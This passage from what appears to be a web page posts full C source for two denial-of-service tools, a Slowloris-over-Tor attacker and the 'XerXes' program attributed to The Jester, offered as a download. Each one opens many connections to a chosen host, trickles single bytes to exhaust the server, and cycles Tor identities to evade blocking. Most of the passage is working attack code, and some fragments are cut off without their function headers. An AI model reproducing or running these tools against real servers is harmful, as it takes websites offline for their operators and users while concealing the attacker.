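        int pad;
        for (pad = 0; pad < indent; pad++)
            putc(' ', stderr);
        fprintf(stderr, "%20x\n", (unsigned char)data[i]);
    }
    fprintf(stderr, "};\n");
}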
struct addrinfo hints, *servinfo, *p;
int sock, r, y=1;
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
return -1;
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
return -2;
}
if(servinfo)
freeaddrinfo(servinfo);
return sock;
}
* I also dedicate this function to pr0f <3
*/
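/*
 * Open a TCP connection to host:port through the local Tor SOCKS5 proxy
 * (127.0.0.1:9050). Speaks the SOCKS5 handshake by hand: a greeting offering
 * "no authentication", then a CONNECT request with the DOMAINNAME address
 * type so Tor resolves the name itself (no local DNS leak).
 *
 * Returns the connected socket, or a negative code:
 *   -1/-2  the SOCKS proxy itself could not be reached (from make_socket)
 *   -3     proxy rejected the greeting, or wrong SOCKS version
 *   -4     proxy refused the CONNECT, or host name is empty / longer than
 *          255 bytes (SOCKS5 carries the name length in a single byte)
 * Every failure path closes the proxy socket; the original returned -3/-4
 * with the descriptor still open, leaking one fd per failed attempt in the
 * reconnect loop. Replies are only inspected once at least two bytes arrived.
 */
int pr0f_loves_me_tor_connect(const char *host, const char *port) {
    unsigned char buf[1024];
    size_t hostlen = strlen(host);
    unsigned short netport;
    ssize_t n;
    int sock;

    fprintf(stderr, "[Connect %s:%s]\n", host, port);
    if (hostlen == 0 || hostlen > 255)
        return -4;
    if ((sock = make_socket("127.0.0.1", "9050")) < 0)
        return sock;

    /* Greeting: VER 5, NMETHODS 1, METHOD 0x00 = no authentication. */
    if (write(sock, "\x05\x01\x00", 3) != 3) {
        close(sock);
        return -3;
    }
    n = read(sock, buf, sizeof(buf));
    /* Expected reply 05 00; anything else (incl. 05 FF "no acceptable method") is a refusal. */
    if (n < 2 || buf[0] != 0x05 || buf[1] != 0x00) {
        close(sock);
        return -3;
    }

    /* CONNECT: VER CMD(1) RSV ATYP(3 = domain name) LEN name PORT (network order). */
    buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03;
    buf[4] = (unsigned char)hostlen;
    memcpy(buf + 5, host, hostlen);
    netport = htons((unsigned short)atoi(port));
    memcpy(buf + 5 + hostlen, &netport, 2);
    /* dump_array("final_request", (char *)buf, 7 + hostlen); */
    if (write(sock, buf, 7 + hostlen) != (ssize_t)(7 + hostlen)) {
        close(sock);
        return -4;
    }
    n = read(sock, buf, sizeof(buf));
    if (n >= 2 && buf[0] == 0x05 && buf[1] == 0x00)
        return sock;   /* REP 0x00 = succeeded; the socket is now a tunnel to host:port */
    close(sock);
    return -4;
}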
/* SIGPIPE handler installed by attack(): writing to a peer that has already
 * closed must not kill the process, so the signal is absorbed here and
 * write() is left to report the failure through its return value. */
void broke(int s) {
    (void)s;   /* signal number is irrelevant */
}
thread_args *a = (thread_args *)arg;
int x, r, socks[CONNECTIONS];
fprintf(stderr, "[Thread Started]\n");
for(x=0; x < CONNECTIONS; x++)
socks[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x < CONNECTIONS; x++) {
if(socks[x] <= 0) {
socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
fprintf(stderr, "[Socket Returned %i]\n", socks[x]);
}
if(write(socks[x], "\0", 1) < 0) {
close(socks[x]);
fprintf(stderr, "[Socket Error Returned %i]\n", socks[x]);
socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
}
}
usleep(100000);
}
}
fprintf(stderr, "Usage: %s
exit(0);
}
int sock = make_socket("localhost", "9051");
char *shit_bucket = calloc(1024, sizeof(char));
if(sock < 0) {
fprintf(stderr, "Can't connect to tor control port\n");
free(shit_bucket);
pthread_exit(NULL);
}
write(sock, "AUTHENTICATE \"\"\n", 16);
while(1) {
write(sock, "signal NEWNYM\n", 15);
fprintf(stderr, "[cycle_identity -> signal NEWNYM\n");
read(sock, shit_bucket, 1024);
sleep(5);
}
}
pthread_t threads[THREADS];
pthread_t cycle_tid;
thread_args arg;
void *status;
int x;
if(argc != 3)
do_help(argv[0]);
arg.host = (const char *)argv[1];
arg.port = (const char *)argv[2];
pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
for(x=0; x < THREADS; x++) {
pthread_create(&threads[x], NULL, attack, &arg);
usleep(200000);
}
for(x=0; x < THREADS; x++)
pthread_join(threads[x], &status);
pthread_kill(cycle_tid, 15);
pthread_exit(NULL);
return 0;
}[/cc]
XerXes Source Code DoS tool download
[cc lang="c"]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Resolve host:port and return a connected TCP socket, trying each address
 * getaddrinfo() returns until one connects (IPv4 or IPv6). Failure is fatal:
 * a message goes to stderr and the process exits -- note the exit status is 0
 * even on error, as in the original. */
int make_socket(char *host, char *port) {
    struct addrinfo hints, *results = NULL, *cand;
    int fd = -1;
    int rc;

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;

    rc = getaddrinfo(host, port, &hints, &results);
    if (rc != 0) {
        fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rc));
        exit(0);
    }

    /* First candidate that both creates a socket and connects wins. */
    for (cand = results; cand; cand = cand->ai_next) {
        fd = socket(cand->ai_family, cand->ai_socktype, cand->ai_protocol);
        if (fd == -1)
            continue;
        if (connect(fd, cand->ai_addr, cand->ai_addrlen) == 0)
            break;
        close(fd);
    }

    if (results)
        freeaddrinfo(results);
    if (cand == NULL) {
        fprintf(stderr, "No connection could be made\n");
        exit(0);
    }
    fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
    return fd;
}
/* No-op SIGPIPE handler (installed in attack()). Without it a write() to a
 * connection the server already closed would terminate the process; with it
 * the write simply fails and the caller reconnects. */
void broke(int s) {
    (void)s;
}
#define CONNECTIONS 8
#define THREADS 48
/* Worker body (one per forked process, see main): keep CONNECTIONS sockets
 * open to host:port and, every 300 ms, write a single NUL byte on each. As
 * the Slowloris-over-tor header on this page describes, the trickle keeps the
 * server holding the connection without a request ever completing. A failed
 * write (peer closed) replaces that socket. `id` only labels the progress
 * output. Never returns. Note make_socket() exits the process on failure, so
 * an unreachable target kills the worker rather than retrying. */
void attack(char *host, char *port, int id) {
    int sockets[CONNECTIONS];
    int x, g=1, r;              /* g is unused */
    for(x=0; x!= CONNECTIONS; x++)
        sockets[x]=0;
    signal(SIGPIPE, &broke);    /* see broke(): EPIPE must not kill the process */
    while(1) {
        for(x=0; x != CONNECTIONS; x++) {
            if(sockets[x] == 0)
                sockets[x] = make_socket(host, port);
            r=write(sockets[x], "\0", 1);
            if(r == -1) {
                close(sockets[x]);
                sockets[x] = make_socket(host, port);
            } else
                // fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
                fprintf(stderr, "[%i: Voly Sent]\n", id);
        }
        /* NOTE(review): printed once more per sweep regardless of outcome, so the
         * same message appears up to CONNECTIONS+1 times every 300 ms. */
        fprintf(stderr, "[%i: Voly Sent]\n", id);
        usleep(300000);
    }
}
/* Ask Tor for a fresh circuit ("signal NEWNYM") every 300 ms over the control
 * protocol, authenticating with an empty password. Only reached when main()
 * gets the wrong argument count, and never returns.
 * NOTE(review): 9050 is Tor's default SOCKS port; the control protocol is
 * conventionally served on 9051 (the Slowloris-over-tor listing above uses
 * 9051), so as written this talks to the SOCKS listener unless Tor is
 * configured otherwise -- confirm. Tor also rate-limits NEWNYM (on the order
 * of once per 10 s), so most of these signals would be delayed or dropped.
 * The local `socket` shadows the socket(2) function; the 16-byte write of
 * "signal NEWNYM\n\x00" (14 text bytes plus an explicit NUL) also sends the
 * literal's implicit terminator; replies are never read. */
void cycle_identity() {
    int r;
    int socket = make_socket("localhost", "9050");
    write(socket, "AUTHENTICATE \"\"\n", 16);   /* 16 bytes: the full line incl. "\n" */
    while(1) {
        r=write(socket, "signal NEWNYM\n\x00", 16);
        fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
        usleep(300000);
    }
}
/* Entry: <prog> <host> <port>. Forks THREADS attack() workers 200 ms apart.
 * NOTE(review): with the wrong argument count no usage is printed; control
 * falls into cycle_identity(), which never returns.
 * Forking shape is inverted from the usual: in each iteration the PARENT
 * (fork() != 0, including a failed fork returning -1) calls attack() and never
 * comes back, while the CHILD continues the loop and forks the next worker.
 * The process that finally reaches getc() is the last child; the THREADS
 * attackers are its ancestors, are never signalled or reaped, and keep running
 * after it exits on Enter/EOF. */
int main(int argc, char **argv) {
    int x;
    if(argc !=3)
        cycle_identity();
    for(x=0; x != THREADS; x++) {
        if(fork())
            attack(argv[1], argv[2], x);
        usleep(200000);
    }
    getc(stdin);
    return 0;
}[/cc]
Attributed to The Jester (th3j35t3r) and meant to be run under torsocks: unlike the Slowloris-over-tor listing above, it has no SOCKS5 client of its own — make_socket() connects to the target directly, so Tor is only in the path if torsocks wraps the process — while cycle_identity() talks to localhost:9050 itself. The attribution is unconfirmed; the Slowloris-over-tor header above states that how XerXes actually works is not publicly known, and this listing closely mirrors that code.
